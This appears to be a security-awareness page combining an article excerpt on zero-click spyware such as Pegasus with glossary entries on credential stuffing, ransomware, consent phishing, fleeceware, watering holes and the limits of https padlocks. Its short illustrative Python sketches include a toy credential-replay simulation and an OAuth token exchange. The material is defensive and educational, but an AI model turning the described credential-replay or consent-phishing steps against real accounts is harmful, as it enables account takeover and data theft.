Zero-click attacks don’t only target phones. In 2021, a zero-click vulnerability gave unauthenticated attackers full control over Hikvision security cameras. Later the same year, a flaw in Microsoft Teams was shown to be exploitable through a zero-click attack that gave hackers access to the target device across major operating systems (Windows, macOS, Linux).

How to detect and mitigate zero-click attacks

Realistically, knowing if a victim is infected is quite tricky, and protecting against a zero-click attack is almost impossible. “Zero-click attacks are way more common than we thought,” says Maynier. He recommends potential targets encrypt all their data, update their devices, have strong passwords, and do everything in their power to protect their digital lives. There’s also something else he tells them: “Consider that they may be compromised and adapt to that.”

Still, users can do a few things to minimize the risk of being spied on. The simplest one is to restart the phone periodically if they own an iPhone. Experts at Amnesty have shown that this could potentially stop Pegasus from working on iOS—at least temporarily. This has the advantage of disabling any code running that has not achieved persistence. However, the disadvantage is that rebooting the device may erase the signs that an infection has occurred, making it much harder for security researchers to determine whether a device has been targeted with Pegasus.

Users should also avoid jailbreaking their devices, because it removes some of the security controls built into the firmware. In addition, a jailbroken device allows the installation of unverified software, which opens users up to running vulnerable code that might be a prime target for a zero-click attack.

As always, maintaining good security hygiene can help. “Segmentation of networks, applications, and users, use of multifactor authentication, use of strong traffic monitoring, good cybersecurity hygiene, and advanced security analytics may prove to slow down or mitigate risks in specific situations,” says Lakhani. “[These] will also make post-exploitation activities difficult for attackers, even if they do compromise [the] systems.”

Maynier adds that high-profile targets should segregate data and have a device only for sensitive communications. He recommends users keep “the smallest amount of information possible on their phone (disappearing messages are a very good tool for that)” and leave it out of the room when they have important face-to-face conversations.

Organizations such as Amnesty and Citizen Lab have published guides instructing users to connect their smartphone to a PC and check to see whether they have been infected with Pegasus. The software used for this, Mobile Verification Toolkit, relies on known Indicators of Compromise such as cached favicons and URLs present in SMS messages. A user does not have to jailbreak their device to run this tool.
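As a rough illustration of the approach the Mobile Verification Toolkit takes, the following sketch compares URLs extracted from SMS messages against a list of known indicator-of-compromise (IoC) domains. The domain names and function are invented for this example; real IoC lists are published by Amnesty and Citizen Lab.

```python
# Hypothetical IoC-matching sketch: flag SMS URLs whose host is a known
# malicious domain or a subdomain of one. The IoC domains are placeholders.

from urllib.parse import urlparse

IOC_DOMAINS = {"badcdn.example", "tracking.example"}  # stand-in IoC list

def find_suspicious_urls(sms_urls):
    """Return URLs whose hostname matches, or is a subdomain of, an IoC domain."""
    hits = []
    for url in sms_urls:
        host = urlparse(url).hostname or ""
        if any(host == d or host.endswith("." + d) for d in IOC_DOMAINS):
            hits.append(url)
    return hits
```

Matching on cached artifacts like these is inherently after-the-fact: it can confirm an infection but cannot prevent one.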

Also, Apple and WhatsApp have both sent messages to people who might have been targeted by zero-click attacks that aimed to install Pegasus. After that, some of them reached out to organizations such as Citizen Lab to further analyze their devices.

Yet technology alone won’t solve the problem, says Amnesty’s Maynier. “This is ultimately a question of policy and regulation,” he adds. “Amnesty, EDRi and many other organizations are calling for a global moratorium on the use, sale, and transfer of surveillance technology until there is a proper human rights regulatory framework in place that protects human rights defenders and civil society from the misuse of these tools.”

The policy answers will have to cover different aspects of this problem, he says, from export control to mandatory human rights due diligence for companies. “We need to put a stop on these widespread abuses first,” Maynier adds.

Source: https://www.csoonline.com/article/3660055/zero-click-attacks-explained-and-why-they-are-so-dangerous.html

Definition: Credential Stuffing

A hacking technique in which login credentials obtained (often stolen) from one site are used to attempt to log into one or more other services – typically higher-value sites like banks, credit cards, etc.

This is why we recommend that you never re-use passwords.
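A toy simulation (not an attack tool) makes the mechanics clear: credentials leaked from one site are simply replayed verbatim against other services, and any account that reuses the same email/password pair falls. All names and passwords below are made up.

```python
# Simulated credential stuffing: replay a leak from "site A" against the
# login databases of two unrelated services.

leaked_from_site_a = {
    ("alice@example.com", "hunter2"),
    ("bob@example.com", "correct-horse"),
}

# Simulated account stores of two other services.
bank_accounts = {"alice@example.com": "hunter2"}    # password reused -> at risk
shop_accounts = {"bob@example.com": "unique-p@ss"}  # unique password -> safe

def stuffing_hits(leak, accounts):
    """Accounts that accept a leaked credential pair unchanged."""
    return [email for email, pw in leak if accounts.get(email) == pw]
```

The only variable that matters here is reuse: Bob's shop account survives purely because its password differs from the leaked one.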

The video below gives a pretty clear explanation of the problem, and offers some ways around it (password managers, multi-factor authentication, passwordless login). We’ll be covering passwordless login soon…

Definition: Ransomware

Ransomware is a form of malware that encrypts a victim’s files. The attacker then demands a ransom from the victim, promising to restore access to the data upon payment.

Users are shown instructions for how to pay a fee to get the decryption key. The costs can range from a few hundred dollars to thousands, typically payable to cybercriminals in hard-to-trace cryptocurrency such as Bitcoin.

Definition: Consent Phishing

A “consent phishing” scam is an attempt by adversaries to get employees to install a malicious application and/or grant it permissions that will allow it to access sensitive data or perform unwanted functions.

This type of consent phishing relies on the OAuth 2.0 authorization technology. By implementing the OAuth protocol into an app or website, a developer gives a user the ability to grant permission to certain data without having to enter their password or other credentials.

Used by a variety of online companies including Microsoft, Google, and Facebook, OAuth is a way to try to simplify the login and authorization process for apps and websites through a single sign-on mechanism. However, as with many technologies, OAuth can be used for both beneficial and malicious purposes.

Microsoft details the problem step by step in its blog post:

  1. An attacker registers an app with an OAuth 2.0 provider.
  2. The app is configured in a way that makes it seem trustworthy, such as using the name of a popular product used in the same ecosystem.
  3. The attacker gets a link in front of users, which may be done through conventional email-based phishing, by compromising a non-malicious website, or through other techniques.
  4. The user clicks the link and is shown an authentic consent prompt asking them to grant the malicious app permissions to data.
  5. If a user clicks Accept, they grant the app permissions to access sensitive data.
  6. The app gets an authorization code, which it redeems for an access token, and potentially a refresh token.
  7. The access token is used to make API calls on behalf of the user.
  8. The attacker can then gain access to the user’s mail, forwarding rules, files, contacts, notes, profile, and other sensitive data.
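Step 6 above, redeeming the authorization code for tokens, can be sketched as the form body a client POSTs to the provider's token endpoint. The parameter names follow the OAuth 2.0 specification (RFC 6749, section 4.1.3); the code, client ID, secret, and redirect URI below are placeholders.

```python
# Sketch of the OAuth 2.0 authorization-code token exchange. Whether the
# client is a legitimate app or a consent-phishing one, this request looks
# the same to the provider -- which is exactly the attacker's advantage.

from urllib.parse import urlencode

def build_token_request(code: str, client_id: str, client_secret: str,
                        redirect_uri: str) -> dict:
    """Form parameters for the POST to the provider's token endpoint."""
    return {
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": redirect_uri,
        "client_id": client_id,
        "client_secret": client_secret,
    }

# URL-encoded body as it would appear on the wire (placeholder values).
body = urlencode(build_token_request(
    "AUTH_CODE", "registered-app-id", "app-secret", "https://app.example/cb"))
```

Nothing in this exchange verifies the app's intent, only its registration, which is why the consent prompt in step 4 is the sole point where the user can stop the attack.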

“Part of the problem is that most users don’t understand what is happening,” Roger Grimes, data driven defense evangelist at KnowBe4 said. “They don’t know that a sign-on that they’ve used with Gmail, Facebook, Twitter or some other OAuth provider is now automatically being called and used or abused by another person. They don’t understand the permission prompts either. All they know is they clicked on an email link or an attachment and now their computer system is asking them to confirm some action that they really don’t understand.”

Definition: Fleeceware

Fleeceware: apps which are marketed as “free”, but which then trick the user into subscribing to paid services (which are available free elsewhere), often for excessive fees.

Common examples are horoscope apps, QR code or barcode scanners, and face filter apps targeted at younger users. Publishers of fleeceware target users who may be less cognizant of, or sensitive to, initial fees and recurring charges.

Often users are hooked by free trials that turn out to be difficult to cancel after the “free” period has lapsed.

These are currently most common on phone apps (both iPhone and Android), but the same techniques can be found with some desktop applications as well.

Definition: Watering-hole campaigns

Watering-hole campaigns make use of malicious websites that lure visitors in with targeted content – cyberattackers often post links to that content on discussion boards and on social media to cast a wide net. When visitors click through to a malicious website, background code will then infect them with malware.

SSL Security Certificates and https://

What is an SSL Certificate and what does it do for me?

An SSL Certificate allows your site to serve your data – and receive input from visitors – in an encrypted form.  This means that if either side is sending sensitive data, it becomes extremely difficult for anyone else to see what is being sent. It’s an important tool to thwart Man-In-The-Middle attacks.

The https:// part of an address signifies that the data being transmitted back and forth between your browser and the site is encrypted using SSL/TLS (“Secure Sockets Layer” / “Transport Layer Security”) and cannot be read by third parties.
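Python's standard `ssl` module makes the distinction concrete: a default TLS context enforces encryption, certificate-chain validation, and hostname matching, but nothing about whether the site's operator is legitimate. A minimal sketch:

```python
# What the padlock actually guarantees, shown via Python's default TLS
# settings. These checks confirm you are talking privately to the host
# named in the URL -- not that the host is trustworthy.

import ssl

ctx = ssl.create_default_context()

# The certificate must chain to a trusted CA...
assert ctx.verify_mode == ssl.CERT_REQUIRED
# ...and must match the hostname being connected to.
assert ctx.check_hostname is True

# But any domain owner -- including a phisher who registered the domain
# yesterday -- can obtain a certificate that passes both checks.
```

This is the gap phishing sites exploit: the connection is genuinely secure, just secure to the wrong party.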

We’re advised to never send sensitive information to a website which does not have the https:// and a padlock icon on the address line, as pretty much anyone can read it if they know how.

However, security expert Brian Krebs points out that the presence of “https://” or a padlock in the browser address bar does not mean the site is legitimate, nor is it any proof the site has been security-hardened against intrusion from hackers.

Here’s a sobering statistic: according to PhishLabs, by the end of 2019 roughly three-quarters (74 percent) of all phishing sites were using SSL certificates.

The reason Mr. Krebs brings this up is that “many U.S. government Web sites now carry a message prominently at the top of their home pages meant to help visitors better distinguish between official U.S. government properties and phishing pages. Unfortunately, part of that message is misleading and may help perpetuate a popular misunderstanding about Web site security and trust that phishers have been exploiting for years now.”

The problem is that those government sites are misinforming the public, including statements such as “The https:// ensures that you are connecting to the official website….”

No, it does NOT.

All it ensures is that you’re connecting to a site which has an SSL Certificate in place. It’s not particularly difficult to obtain a .gov domain name, and it’s a fairly trivial exercise these days to get a basic SSL Certificate.  So all that the https:// on a .gov site ensures is that someone got a .gov domain name and put an SSL Cert on it – nothing more.

The moral? Make sure you’re going to the right site! Both for government sites and for anything else you do online.

Original article at Krebs On Security